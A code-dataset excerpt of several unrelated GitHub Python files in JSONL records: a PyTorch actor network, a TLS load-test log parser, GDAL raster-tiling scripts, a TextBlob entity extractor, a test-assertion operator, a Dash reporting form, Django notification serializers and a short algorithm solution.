11:28:06\n @Version: 1.0\n @Description: 动作网络\n'''\n\n\n\nimport torch.nn as nn\nimport torch.nn.functional as nn_f\nimport torch\n\n\n# 动作网络\nclass ANet(nn.Module):\n def __init__(self, in_features, out_features, hidden_1=128, hidden_2=64):\n super(ANet, self).__init__()\n # self.bn = nn.BatchNorm1d(in_features)\n self.fc1 = nn.Linear(in_features, hidden_1)\n self.fc1.weight.data.normal_(0, 0.1)\n self.fc2 = nn.Linear(hidden_1, hidden_2)\n self.fc2.weight.data.normal_(0, 0.1)\n self.fc3 = nn.Linear(hidden_2, hidden_2)\n self.fc3.weight.data.normal_(0, 0.1)\n self.out = nn.Linear(hidden_2, out_features)\n self.out.weight.data.normal_(0, 0.1)\n\n def forward(self, s):\n # s = torch.batch_norm(s)\n x = self.fc1(s)\n x = nn_f.leaky_relu(x)\n x = self.fc2(x)\n x = nn_f.leaky_relu(x)\n x = self.fc3(x)\n x = nn_f.leaky_relu(x)\n x = self.out(x)\n x = torch.sigmoid(x)\n return x\n","repo_name":"Milo-F/THz_PCJS_RL","sub_path":"networks/DDPG/ANet.py","file_name":"ANet.py","file_ext":"py","file_size_in_byte":1128,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"40"} +{"seq_id":"24008358611","text":"from stan import StanDict, StanData\nfrom .parser import Parser, ParserError\nfrom tqdm import tqdm\nfrom os import path\nfrom collections import Iterable\n\n# Common operations offsets\nTIMESTAMP = 0\nSTART_TIME_AND_PROCESS_ID = 1\nTHREAD_ID = 2\nCONNECTION_ID = 3\nOPERATION_CODE = 4\n\n# Specific operations offsets\nREQUEST_ID = 5\nREQUEST_FILE_NAME = 6\nSEND_DATA_ID = 6\nSEND_DATA_SIZE = 7\nREQUEST_SEND_DATA_SIZE = 6\n\nRECV_DATA_ID = 6\nRECV_DATA_SIZE = 7\nRESPONSE_RECV_DATA_SIZE = 6\n\nSSL_SEND_DATA_SIZE = 5\nSSL_RECV_DATA_SIZE = 6\n\n# Operations codes\nSTART_ASYNC = '0'\nSUCCESS_ASYNC = '1'\nFAILED_ASYNC = '2'\n\nSTART_SSL_HANDSHAKE = '3'\nSUCCESS_SSL_HANDSHAKE = '4'\nFAILED_SSL_HANDSHAKE = '5'\n\nSTART_SEND_REQ = '6'\nSTART_SEND_DATA = '7'\nSUCCESS_SEND_DATA = '8'\nFAILED_SEND_DATA = '9'\nFINISH_SEND_REQ = '10'\nFAILED_SEND_REQ = '11'\n\nSTART_RECV_RSP = '12'\nSTART_RECV_DATA = '13'\nSUCCESS_RECV_DATA = '14'\nFAILED_RECV_DATA = '15'\nSUCCESS_RECV_RSP = '16'\nFAILED_RECV_RSP = '17'\n\nCLOSE_SSL_CONNECTION = '18'\n\n\nclass TlsMeterStatFile:\n\n def __init__(self, file_path):\n\n self.sampling_interval = 's'\n self.tlsm_log_file = file_path\n\n self.stat = dict(\n timestamp=[],\n\n tcp_connections_per_second=[],\n ssl_connections_per_second=[],\n throughput_upload=[],\n throughput_download=[],\n req_per_second=[],\n rsp_per_second=[],\n active_tcp_connections_count=[],\n active_ssl_connections_count=[],\n\n tcp_times=[],\n ssl_handshake_times=[],\n ttfb_times=[],\n connection_times=[],\n\n failed_tcp_per_second=[],\n failed_ssl_per_second=[],\n failed_req_per_second=[],\n failed_rsp_per_second=[],\n failed_total_per_second=[]\n )\n\n self._connections_start_times = dict()\n self._success_tcp_connections = set()\n self._success_ssl_connections = set()\n self._failed_req_rsp_connections = set()\n\n def _get_time_interval(self, timestamp: int) -> int:\n \"\"\"\n \"Round\" the timestamp to the specified interval\n\n :param timestamp: nanosecond\n :return: time interval timestamp (Unix time)\n \"\"\"\n # TODO: Expand the supported averaging intervals\n if self.sampling_interval == 's':\n return timestamp//10**9\n\n def _process_operation(self, operation: list):\n # Unique connection ID in the context of all processes and threads of tls_meter\n connection_id = '_'.join([operation[THREAD_ID], operation[CONNECTION_ID]])\n\n operation_timestamp = int(operation[TIMESTAMP])\n operation_time_interval = self._get_time_interval(operation_timestamp)\n\n # If the first or the new interval, then we add new records to the statistics\n if len(self.stat['timestamp']) == 0 or operation_time_interval > self.stat['timestamp'][-1]:\n self.stat['timestamp'].append(operation_time_interval)\n self.stat['tcp_connections_per_second'].append(0)\n self.stat['ssl_connections_per_second'].append(0)\n self.stat['throughput_upload'].append(0)\n self.stat['throughput_download'].append(0)\n self.stat['req_per_second'].append(0)\n self.stat['rsp_per_second'].append(0)\n self.stat['active_tcp_connections_count'].append(self.stat['active_tcp_connections_count'][-1]\n if len(self.stat['active_tcp_connections_count']) != 0\n else 0)\n self.stat['active_ssl_connections_count'].append(self.stat['active_ssl_connections_count'][-1]\n if len(self.stat['active_ssl_connections_count']) != 0\n else 0)\n\n self.stat['tcp_times'].append([])\n self.stat['ssl_handshake_times'].append([])\n self.stat['ttfb_times'].append([])\n self.stat['connection_times'].append([])\n\n self.stat['failed_tcp_per_second'].append(0)\n self.stat['failed_ssl_per_second'].append(0)\n self.stat['failed_req_per_second'].append(0)\n self.stat['failed_rsp_per_second'].append(0)\n self.stat['failed_total_per_second'].append(0)\n\n if operation[OPERATION_CODE] == START_ASYNC:\n self._connections_start_times[connection_id] = operation_timestamp\n elif operation[OPERATION_CODE] == SUCCESS_ASYNC:\n self.stat['tcp_connections_per_second'][-1] += 1\n self.stat['active_tcp_connections_count'][-1] += 1\n self._success_tcp_connections.add(connection_id)\n self.stat['tcp_times'][-1].append(operation_timestamp - self._connections_start_times[connection_id])\n elif operation[OPERATION_CODE] == FAILED_ASYNC:\n self.stat['failed_tcp_per_second'][-1] += 1\n self.stat['failed_total_per_second'][-1] += 1\n elif operation[OPERATION_CODE] == START_SSL_HANDSHAKE:\n pass\n elif operation[OPERATION_CODE] == SUCCESS_SSL_HANDSHAKE:\n self.stat['ssl_connections_per_second'][-1] += 1\n self.stat['active_ssl_connections_count'][-1] += 1\n self._success_ssl_connections.add(connection_id)\n self.stat['ssl_handshake_times'][-1].append(operation_timestamp - self._connections_start_times[connection_id])\n elif operation[OPERATION_CODE] == FAILED_SSL_HANDSHAKE:\n self.stat['failed_ssl_per_second'][-1] += 1\n self.stat['failed_total_per_second'][-1] += 1\n elif operation[OPERATION_CODE] == START_SEND_REQ:\n pass\n elif operation[OPERATION_CODE] == START_SEND_DATA:\n pass\n elif operation[OPERATION_CODE] == SUCCESS_SEND_DATA:\n self.stat['throughput_upload'][-1] += int(operation[SEND_DATA_SIZE])\n elif operation[OPERATION_CODE] == FAILED_SEND_DATA:\n pass\n elif operation[OPERATION_CODE] == FINISH_SEND_REQ:\n self.stat['req_per_second'][-1] += 1\n elif operation[OPERATION_CODE] == FAILED_SEND_REQ:\n self.stat['failed_req_per_second'][-1] += 1\n self.stat['failed_total_per_second'][-1] += 1\n self._failed_req_rsp_connections.add(connection_id)\n elif operation[OPERATION_CODE] == START_RECV_RSP:\n if operation[REQUEST_ID] == '1':\n self.stat['ttfb_times'][-1].append(operation_timestamp - self._connections_start_times[connection_id])\n elif operation[OPERATION_CODE] == START_RECV_DATA:\n pass\n elif operation[OPERATION_CODE] == SUCCESS_RECV_DATA:\n self.stat['throughput_download'][-1] += int(operation[RECV_DATA_SIZE])\n elif operation[OPERATION_CODE] == FAILED_RECV_DATA:\n pass\n elif operation[OPERATION_CODE] == SUCCESS_RECV_RSP:\n self.stat['rsp_per_second'][-1] += 1\n elif operation[OPERATION_CODE] == FAILED_RECV_RSP:\n self.stat['failed_rsp_per_second'][-1] += 1\n self.stat['failed_total_per_second'][-1] += 1\n self._failed_req_rsp_connections.add(connection_id)\n elif operation[OPERATION_CODE] == CLOSE_SSL_CONNECTION:\n if connection_id in self._success_tcp_connections:\n self.stat['active_tcp_connections_count'][-1] -= 1\n if connection_id in self._success_ssl_connections:\n self.stat['active_ssl_connections_count'][-1] -= 1\n if connection_id not in self._failed_req_rsp_connections:\n self.stat['connection_times'][-1].append(operation_timestamp - self._connections_start_times[connection_id])\n\n def parse(self):\n with open(self.tlsm_log_file, 'r') as stat_file:\n\n file_size = sum(1 for l in open(self.tlsm_log_file))\n desc = '{}'.format(path.basename(self.tlsm_log_file))\n\n for line in tqdm(stat_file, total=file_size, desc=desc):\n if line[0].isdigit():\n operation = line.strip().split(';')\n self._process_operation(operation)\n\n return {ts: {metric: self.stat[metric][n]\n for metric in self.stat if metric is not 'timestamp'}\n for n, ts in enumerate(self.stat['timestamp'])}\n\n\nclass TlsmCsvParser(Parser):\n def __init__(self):\n self.stat_files = None\n self.stat = dict()\n\n def parse(self, file_paths: Iterable):\n if self.stat_files is not None:\n self.__init__()\n\n self.stat_files = file_paths\n\n for file in tqdm(self.stat_files, desc='Total'):\n\n tlsm_stat = TlsMeterStatFile(file)\n _stat = tlsm_stat.parse()\n\n for time in _stat:\n if time in self.stat:\n for metric in _stat[time]:\n self.stat[time][metric] += _stat[time][metric]\n else:\n self.stat[time] = _stat[time]\n\n for time in tqdm(self.stat, desc='Calculating average time stats'):\n for time_metric in {'tcp_times', 'ssl_handshake_times', 'ttfb_times', 'connection_times'}:\n self.stat[time][time_metric] = sum(self.stat[time][time_metric]) /\\\n (1 if len(self.stat[time][time_metric]) == 0\n else len(self.stat[time][time_metric])) /\\\n 1000000\n\n def get_stat(self) -> StanData:\n result = StanData()\n for ts in self.stat:\n metrics = StanDict()\n for metric in self.stat[ts]:\n metrics[metric] = self.stat[ts][metric]\n result.append(ts, metrics)\n\n return result\n","repo_name":"itsens/stan","sub_path":"stan/parser/tlsm.py","file_name":"tlsm.py","file_ext":"py","file_size_in_byte":9850,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"33095633221","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu Nov 21 07:48:23 2019\r\n\r\n@author: medad\r\n\"\"\"\r\n\r\nimport os\r\nfrom osgeo import gdal\r\nimport numpy as np\r\nimport osgeo.ogr as ogr\r\nfrom osgeo import gdalconst\r\nimport subprocess\r\n\r\n\r\ndef createFolder(path):\r\n\tpath2 = os.path.dirname(path)\r\n\tprint (path2)\r\n\ttry:\r\n\t\tdic2 = path2 +'\\\\'+ 'TrainSet'\r\n\t\tif not os.path.exists(dic2):\r\n\t\t\tos.makedirs(dic2)\r\n\t\t\tprint ('Createrd folder {}'.format(dic2))\r\n\t\telse:\r\n\t\t\tprint ('folder {} is already created'.format(dic2))\r\n\texcept OSError:\r\n\t\tprint (\"Error Create dic\")\r\n \r\n\treturn dic2\r\n \r\n\r\ndef avr_bands(in_ds):\r\n \r\n name = os.path.basename(in_ds).split('.')[0]\r\n out = os.path.dirname(in_ds) + '\\\\'+name+'_gray.tif'\r\n in_ds = gdal.Open(in_ds)\r\n num_bands = in_ds.RasterCount\r\n band1 = in_ds.GetRasterBand(1) \r\n band2 = in_ds.GetRasterBand(2) \r\n band3 = in_ds.GetRasterBand(3)\r\n red = band1.ReadAsArray()*0.3\r\n blue = band3.ReadAsArray()*0.11\r\n if num_bands == 4:\r\n band4 = in_ds.GetRasterBand(4)\r\n green_inf = np.mean([band2.ReadAsArray(),band4.ReadAsArray()],axis = 0)*0.59\r\n else:\r\n print (\"didn't find the 4th band\")\r\n green_inf = np.mean([band2.ReadAsArray()],axis = 0)*0.59\r\n \r\n new_array = np.sum([green_inf,blue,red],axis = 0)\r\n driver = gdal.GetDriverByName('GTiff')\r\n out_ds = driver.Create(out, in_ds.RasterXSize, in_ds.RasterYSize, 1, gdal.GDT_CFloat64)\r\n \r\n out_ds.SetProjection (in_ds.GetProjection())\r\n out_ds.SetGeoTransform(in_ds.GetGeoTransform())\r\n \r\n out_band = out_ds.GetRasterBand(1)\r\n out_band.WriteArray (new_array)\r\n out_band.FlushCache ()\r\n out_ds.FlushCache ()\r\n\r\n return out\r\n\r\n\r\ndef get_img_shp(folder):\r\n img = []\r\n shp = []\r\n for root, dirs, files in os.walk(folder):\r\n for file in files:\r\n if file.endswith('tif'):\r\n img.append(root +'\\\\' + file)\r\n if file.endswith('shp'):\r\n shp.append(root +'\\\\' + file)\r\n \r\n \r\n return shp,img\r\n\r\n\r\ndef Cut_raster_to_pices(path_raster,out_put_folder,name = 'None',tilesize = 512):\r\n \r\n in_ds = gdal.Open(path_raster)\r\n width = in_ds.RasterXSize\r\n height = in_ds.RasterYSize\r\n\r\n for i in range(0,width,tilesize):\r\n for j in range(0,height,tilesize):\r\n w = tilesize\r\n h = tilesize\r\n gdaltranString = \"gdal_translate -of GTIFF -srcwin \"+str(i)+\", \"+str(j)+\", \"+str(w)+\", \" \\\r\n +str(h)+\" \" + path_raster + \" \" + out_put_folder + \"\\\\_\"+ str(name) +str(i)+\"_\"+str(j)+\".tif\"\r\n os.system(gdaltranString)\r\n\r\n\r\ndef del_ras(folder,by_name):\r\n delete = 0\r\n no_del = 0\r\n for root, dirs, files in os.walk(folder):\r\n for file in files:\r\n if file.endswith('tif'):\r\n if by_name in file:\r\n try:\r\n os.remove(root +'\\\\' + file)\r\n delete += 1\r\n except:\r\n print ('coudnt delete: {}'.format(root +'\\\\' + file))\r\n no_del += 1\r\n print ('total deleted: {}'.format(delete))\r\n print ('total coudnt deleted: {}'.format(no_del))\r\n\r\ndef RasterRize_gdal(ndsm,shp,output):\r\n \r\n\r\n data = gdal.Open(ndsm, gdalconst.GA_ReadOnly)\r\n geo_transform = data.GetGeoTransform()\r\n \r\n x_min = geo_transform[0]\r\n y_max = geo_transform[3]\r\n y_min = y_max + geo_transform[5] * data.RasterYSize\r\n x_res = data.RasterXSize\r\n y_res = data.RasterYSize\r\n mb_v = ogr.Open(shp)\r\n mb_l = mb_v.GetLayer()\r\n pixel_width = geo_transform[1]\r\n \r\n target_ds = gdal.GetDriverByName('GTiff').Create(output, x_res, y_res, 1, gdal.GDT_Byte)\r\n target_ds.SetGeoTransform((x_min, pixel_width, 0, y_min, 0, pixel_width))\r\n band = target_ds.GetRasterBand(1)\r\n NoData_value = -999999\r\n band.SetNoDataValue(NoData_value)\r\n band.FlushCache()\r\n gdal.RasterizeLayer(target_ds, [1], mb_l, options=[\"ATTRIBUTE=Class_num\"])\r\n \r\n target_ds = None\r\n \r\n return output\r\n\r\n\r\ndef del_zero_value_in_raster(folder):\r\n rasters = []\r\n file_type = r'tif'\r\n \r\n for root, dirs, files in os.walk(folder):\r\n for f in files:\r\n if f.endswith(file_type):\r\n rasters.append(root +'\\\\'+f)\r\n \r\n \r\n for ras in rasters:\r\n raster = gdal.Open(ras)\r\n \r\n \r\n num_bands = raster.RasterCount\r\n \r\n num = 0\r\n for i in range(1,num_bands+1):\r\n band = raster.GetRasterBand(i)\r\n band_array = band.ReadAsArray()\r\n mean_band = np.mean(band_array)\r\n num += mean_band\r\n \r\n del raster\r\n del band\r\n del band_array\r\n del mean_band\r\n \r\n if num == 0:\r\n os.remove(ras)\r\n print (\"deleted {} because of no value\".format(ras))\r\n else:\r\n pass\r\n #print (\"{} have_value\".format(ras))\r\n\r\n\r\n\r\ndef get_list_of_Values(shp_in,attri):\r\n driver = ogr.GetDriverByName('ESRI Shapefile')\r\n dataSource = driver.Open(shp_in,0)\r\n layer = dataSource.GetLayer()\r\n list_field = [attri]\r\n value_list = []\r\n for feature in layer:\r\n value_list.append([feature.GetField(j) for j in list_field][0])\r\n \r\n value_list = list(set(value_list))\r\n return value_list\r\n\r\n\r\ndef RasterizShape_subprocess(shp_in,img_ref,name):\r\n\r\n print (os.path.dirname(shp_in) + '\\\\' + 'LBL_{}.tif'.format(str(name)))\r\n img_out = os.path.dirname(shp_in) + '\\\\' + 'LBL_{}.tif'.format(str(name))\r\n \r\n img_ref = gdal.Open(img_ref)\r\n img_ref_cols = img_ref.RasterXSize\r\n img_ref_rows = img_ref.RasterYSize\r\n geotransform = img_ref.GetGeoTransform()\r\n top_left_X = geotransform[0]\r\n pixel_size = float(geotransform[1]) # pixel size in the X direction\r\n top_left_Y = geotransform[3]\r\n xmin = top_left_X\r\n ymin = top_left_Y - img_ref_rows*pixel_size\r\n xmax = top_left_X + img_ref_cols*pixel_size\r\n ymax = top_left_Y \r\n\r\n print (\"[info]runing the tool\")\r\n subprocess.call('gdal_rasterize --config GDAL_CACHEMAX 10000 -ot Byte -te {} {} {} {} -tr {} {} -a CLASS {} {} -where \"Class_num = {}\"'.format(xmin,str(name)),shell = True)\r\n \r\n return img_out\r\n\r\n\r\n\r\nshp_path = r'C:\\Users\\medad\\python\\GIStools\\TREES\\data\\Pre_ML\\Sample_3.shp'\r\nraster_path = r\"C:\\GIS_layers\\raster\\ortho\\RSH-1231_ITM_20cm_CNZ.tif\"\r\n\r\nfolder = createFolder(shp_path)\r\n#Cut_raster_to_pices(raster_path,folder,name = 'None',tilesize = 512)\r\n\r\nname_ras = os.path.dirname(folder) + '\\\\' +'rastarize_shp.tif'\r\nRasterRize_gdal(raster_path,shp_path,name_ras)\r\n \r\nCut_raster_to_pices(name_ras,folder,name = 'ras_shp_',tilesize = 512)\r\n\r\n\r\n#shps,imgs = get_img_shp(folder)\r\n#num = 0\r\n#for img in imgs:\r\n# try:\r\n# if 'gray' not in img:\r\n# avr_bands(img)\r\n# if num%10 == 0:\r\n# print (num)\r\n# \r\n# num +=1\r\n# except:\r\n# print (\"coudnt make: {} \".format(img))\r\n## \r\n#\r\n#list_val = get_list_of_Values(shp_path,'CLASS')\r\n#list_val = [15,31,7]\r\n#for val in list_val:\r\n# print (' # # working on {} # # '.format(val))\r\n# img_out = RasterizShape_subprocess (shp_path,raster_path,str(val))\r\n# Cut_raster_to_pices(img_out,folder,name = 'LBL_'+ str(val) +'_',tilesize = 512)\r\n#\r\n\r\ndel_zero_value_in_raster(folder)\r\n\r\n","repo_name":"OrLeaKatz/TreeDetection","sub_path":"medad/Gdal/Pre_ML_Trees.py","file_name":"Pre_ML_Trees.py","file_ext":"py","file_size_in_byte":7534,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"30644766153","text":"from textblob import TextBlob\nfrom textblob.np_extractors import ConllExtractor\nfrom textblob.taggers import NLTKTagger\nfrom textblob import Word\nimport wikipediaapi\n\n\nnltk_tagger = NLTKTagger()\ngood_PoS_Tags = [\"NN\", \"NNS\", \"NNP\", \"NNPS\"]\nwiki_wiki = wikipediaapi.Wikipedia('en')\n\ndef wikicategories(category):\n page_py = wiki_wiki.page(category)\n if len(category) > 2 and page_py.exists() and (\"refer to:\" != page_py.summary[-9:]):\n return page_py.title\n return \"\"\n\ndef getShingles(target_tweet):\n\n entityDict = {}\n\n blob = TextBlob(target_tweet, pos_tagger=nltk_tagger)\n\n try:\n keywords = blob.pos_tags\n lastNoun = \"\"\n\n for taggedTuple in keywords:\n\n keyword = taggedTuple[0]\n tag = taggedTuple[1]\n\n if tag in good_PoS_Tags:\n\n wikiTitle = wikicategories(keyword.lower())\n # check if wiki article exists for entity\n if wikiTitle and keyword.lower() != \"gift\":\n\n if keyword.lower() in entityDict:\n entityDict[wikiTitle.lower()] += blob.sentiment.polarity\n else:\n entityDict[wikiTitle.lower()] = blob.sentiment.polarity\n\n if(lastNoun):\n\n keyword = lastNoun + \" \" + keyword\n wikiTitle = wikicategories(keyword.lower())\n print(keyword)\n if wikiTitle and keyword.lower() != \"gift\":\n\n if keyword.lower() in entityDict:\n entityDict[wikiTitle.lower()] += blob.sentiment.polarity\n else:\n entityDict[wikiTitle.lower()] = blob.sentiment.polarity\n\n lastNoun = keyword;\n\n else:\n lastNoun = \"\"\n\n except Exception as e:\n print(e)\n\n print(entityDict)","repo_name":"Nikhil-Dreddy/Dena","sub_path":"TextblobShingles.py","file_name":"TextblobShingles.py","file_ext":"py","file_size_in_byte":1889,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"18625229984","text":"# -*- coding: utf-8 -*-\nfrom array import array\nfrom six.moves import collections_abc\nimport six\n\nfrom ..operator import Operator\n\n\nclass ContainOperator(Operator):\n \"\"\"\n Asserts if a given value or values can be found\n in a another object.\n\n Example::\n\n # Should style\n 'foo bar' | should.contain('bar')\n ['foo', 'bar'] | should.contain('bar')\n ['foo', 'bar'] | should.contain('foo', 'bar')\n [{'foo': True}, 'bar'] | should.contain({'foo': True})\n\n # Should style - negation form\n 'foo bar' | should.do_not.contain('bar')\n ['foo', 'bar'] | should.do_not.contain('baz')\n\n # Expect style\n 'foo bar' | expect.to.contain('bar')\n ['foo', 'bar'] | expect.to.contain('bar')\n ['foo', 'bar'] | expect.to.contain('foo', 'bar')\n [{'foo': True}, 'bar'] | expect.to.contain({'foo': True})\n\n # Expect style - negation form\n 'foo bar' | expect.to_not.contain('bar')\n ['foo', 'bar'] | expect.to_not.contain('baz')\n \"\"\"\n\n # Is the operator a keyword\n kind = Operator.Type.MATCHER\n\n # Enable diff report\n show_diff = True\n\n # Operator keywords\n operators = ('contain', 'contains', 'includes')\n\n # Operator chain aliases\n aliases = ('value', 'item', 'string', 'text', 'expression', 'data')\n\n # Expected template message\n expected_message = Operator.Dsl.Message(\n 'a value that contains \"{value}\"',\n 'a value that does not contains \"{value}\"',\n )\n\n # Subject template message\n subject_message = Operator.Dsl.Message(\n 'a value of type \"{type}\" with content \"{value}\"',\n )\n\n # Stores types to normalize before the assertion\n NORMALIZE_TYPES = (\n collections_abc.Iterator,\n collections_abc.MappingView,\n collections_abc.Set,\n array\n )\n\n LIST_TYPES = (tuple, list, set, array)\n\n def match(self, subject, *values):\n if isinstance(subject, self.NORMALIZE_TYPES):\n subject = list(subject)\n elif isinstance(subject, collections_abc.Mapping):\n subject = list(subject.values())\n\n if not isinstance(subject, collections_abc.Sequence):\n return False, ['is not a valid sequence type']\n\n reasons = []\n\n if len(values) == 1 and isinstance(values[0], self.LIST_TYPES):\n values = list(values[0])\n\n for value in values:\n matches_any, reason = self._matches_any(value, subject)\n reasons.append(reason)\n\n if not matches_any:\n return False, [reason]\n\n return True, reasons\n\n def _matches_any(self, expected, subject):\n if len(subject) == 0:\n return False, 'empty item'\n\n if isinstance(subject, six.string_types):\n if expected in subject:\n return True, 'item {0!r} found'.format(expected)\n return False, 'item {0!r} not found'.format(expected)\n\n for item in subject:\n if item == expected:\n return True, 'item {0!r} found'.format(expected)\n\n return False, 'item {0!r} not found'.format(expected)\n","repo_name":"grappa-py/grappa","sub_path":"grappa/operators/contain.py","file_name":"contain.py","file_ext":"py","file_size_in_byte":3134,"program_lang":"python","lang":"en","doc_type":"code","stars":133,"dataset":"github-code","pt":"40"} +{"seq_id":"11039817410","text":"import dash_core_components as dcc\r\nimport dash_html_components as html\r\nfrom dash.dependencies import Input, Output, State\r\nimport dash_bootstrap_components as dbc\r\nimport datetime\r\nimport dash_table\r\n\r\nfrom Dash_App.app import app\r\nimport pandas as pd\r\n\r\nrow1 = html.Div(\r\n [\r\n dbc.Row([\r\n dbc.Col([\r\n dbc.Input(id=\"client_id\",\r\n type=\"text\",\r\n placeholder=\"Client ID\",\r\n style={'width': '150px'}),\r\n ]),\r\n\r\n dbc.Col([\r\n dbc.Input(id=\"profile_id\",\r\n type=\"text\",\r\n placeholder=\"Profile ID\",\r\n style={'width': '150px'}),\r\n ]),\r\n dbc.Col([\r\n dbc.Input(id=\"refresh_token\",\r\n type=\"text\",\r\n style={'width': '150px'},\r\n placeholder=\"Refresh Token\")\r\n ]),\r\n dbc.Col([\r\n dbc.Input(id=\"client_secret\",\r\n type=\"text\",\r\n style={'width': '150px'},\r\n placeholder=\"Client Secret\")\r\n ]),\r\n\r\n dbc.Col([\r\n dcc.Dropdown(\r\n id='dimensions',\r\n options=[{'label': i, 'value': i} for i in ['Campaign', 'Placement', 'Creative']],\r\n multi=True,\r\n style={'width': '150px'},\r\n placeholder='Dimensions')\r\n ]),\r\n\r\n dbc.Col([\r\n dcc.Dropdown(\r\n id='metrics',\r\n options=[{'label': i, 'value': i} for i in ['account_currency',\r\n 'account_id',\r\n 'account_name',\r\n ]],\r\n multi=True,\r\n style={'width': '150px'},\r\n placeholder='Metrics')\r\n ]),\r\n ], align=\"center\"),\r\n ], style={'margin-top': 20, 'margin-left': -90}\r\n)\r\n\r\nrow2 = html.Div([\r\n dbc.Row([\r\n # dbc.Col([\r\n # dcc.Dropdown(\r\n # id='breakdown',\r\n # options=[{'label': i, 'value': i} for i in ['ad_format_asset', 'age', 'body_asset',\r\n # 'call_to_action_asset', 'country',\r\n # ]], disabled=True,\r\n # multi=True,\r\n # style={'width': '250px'},\r\n # placeholder='Breakdown'),\r\n # ]),\r\n\r\n dbc.Col([\r\n dcc.DatePickerSingle(\r\n id='start-date',\r\n placeholder=\"Start Date\",\r\n min_date_allowed=datetime.datetime.now().strftime('2018-01-01'),\r\n max_date_allowed=datetime.datetime.today().date(),\r\n display_format='YYYY-MM-DD',\r\n style={'width': '150px', 'margin-left': 180}\r\n ),\r\n ]),\r\n dbc.Col([\r\n dcc.DatePickerSingle(\r\n id='end-date',\r\n placeholder=\"End Date\",\r\n min_date_allowed=datetime.datetime.now().strftime('2018-01-01'),\r\n max_date_allowed=datetime.datetime.today().date(),\r\n display_format='YYYY-MM-DD',\r\n style={'width': '150px', 'margin-left': 50}\r\n )]),\r\n ])\r\n])\r\n\r\nrow3 = html.Div([\r\n dbc.Row([\r\n dbc.Col([\r\n html.Button(id='submit-button', type='submit', children='Submit', style={'width': '150px', 'margin-top': 5,\r\n 'margin-left': 370}),\r\n\r\n ], width={\"order\": \"first\"}),\r\n dbc.Col([\r\n html.Div(id='output_div-dcm'),\r\n ])\r\n ])\r\n])\r\n\r\ntab_3_layout = dbc.Container(children=[\r\n row1,\r\n html.Br(),\r\n row2,\r\n html.Br(),\r\n row3,\r\n html.Br(),\r\n\r\n]\r\n)\r\n\r\n\r\n@app.callback(Output('output_div-dcm', 'children'),\r\n [Input('submit-button', 'n_clicks')],\r\n [State('client_id', 'value'),\r\n State('profile_id', 'value'),\r\n State('refresh_token', 'value'),\r\n State('client_secret', 'value'),\r\n State('dimensions', 'value'),\r\n State('metrics', 'value'),\r\n State('start-date', 'date'),\r\n State('end-date', 'date'),\r\n ],\r\n )\r\ndef dcm_output(clicks, client_id, profile_id, refresh_token, client_secret, dimensions, metrics, start_date, end_date):\r\n if clicks is not None:\r\n my_client_id = client_id\r\n my_profile_id = profile_id\r\n my_refresh_token = refresh_token\r\n my_client_secret = client_secret\r\n my_dimensions = dimensions\r\n my_metrics = metrics\r\n my_start_date = start_date\r\n my_end_date = end_date\r\n\r\n async_job = ''\r\n df = pd.DataFrame(async_job)\r\n dff = df['']\r\n html.Br()\r\n return html.Div([\r\n dash_table.DataTable(\r\n css=[{'selector': '.row',\r\n 'rule': 'margin: 0; white-space: inherit; overflow: inherit; text-overflow: inherit;'}],\r\n id='table',\r\n columns=[{\"name\": i, \"id\": i} for i in dff.columns],\r\n data=dff.to_dict(\"rows\"),\r\n export_format=\"csv\",\r\n style_cell={\"fontFamily\": \"Arial\", \"size\": 10, 'textAlign': 'left',\r\n 'width': '{}%'.format(len(dff.columns)), 'textOverflow': 'ellipsis', 'overflow': 'hidden'},\r\n\r\n style_table={'maxHeight': '200px', 'overflowY': 'scroll', 'maxWidth': '1500px', 'overflowX': 'scroll'},\r\n style_header={'backgroundColor': '#ffd480', 'color': 'white', 'height': '10', 'width': '10',\r\n 'fontWeight': 'bold'},\r\n style_data={'whiteSpace': 'auto', 'height': 'auto', 'width': 'auto'},\r\n tooltip_data=[\r\n {\r\n column: {'value': str(value), 'type': 'markdown'}\r\n for column, value in row.items()\r\n } for row in dff.to_dict('rows')\r\n ],\r\n tooltip_duration=None\r\n ),\r\n ], style={'margin-top': 30, 'display': 'inline-block', 'margin-left': 20, 'width': '100%'})\r\n","repo_name":"dharmen001/DashApp","sub_path":"tabs/DCM.py","file_name":"DCM.py","file_ext":"py","file_size_in_byte":6575,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"32490186848","text":"from rest_framework import serializers\nfrom Post.models import Post\nfrom account.models import Account\nfrom Post.serializers import PostSerializer, UserSerializer\nfrom account.serializers import AccountSerializer\nfrom django.contrib.auth.models import User\nfrom .models import Notification\n\nclass GenericNotificationRelatedField(serializers.RelatedField):\n\n def to_representation(self, value):\n if isinstance(value, User):\n serializer = UserSerializer(value)\n if isinstance(value, Post):\n serializer = PostSerializer(value)\n\n return serializer.data\n\n\nclass NotificationSerializer(serializers.Serializer):\n actor = serializers.ReadOnlyField(source='actor.username')\n actor_account = AccountSerializer()\n recipient = serializers.ReadOnlyField(source='recipient.username')\n recipient_account = AccountSerializer()\n action_object_event = PostSerializer()\n unread = serializers.BooleanField(read_only=True)\n target = GenericNotificationRelatedField(read_only=True)\n verb = serializers.ReadOnlyField()\n\n class Meta:\n model = Notification\n fields = ('actor_account', 'verb', 'recipient_account', 'unread', 'target', 'action_object_event')\n\n def create(self, validated_data):\n return Notification.objects.create(**validated_data)","repo_name":"soncojmk/poppin","sub_path":"notifications/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":1318,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"7060710317","text":"\"\"\"\nhttps://www.hackerearth.com/zh/practice/data-structures/linked-list/singly-linked-list/practice-problems/algorithm/remove-friends-5/\n\"\"\"\n\nfrom collections import deque\n\nfor _ in range(int(input())):\n n, k = map(int, input().split())\n lst = list(map(int, input().split()))\n\n res = deque()\n for el in lst:\n while k > 0 and res and res[-1] < el:\n res.pop()\n k -= 1\n res.append(el)\n while k > 0:\n res.pop()\n k -= 1\n print(' '.join(map(str, 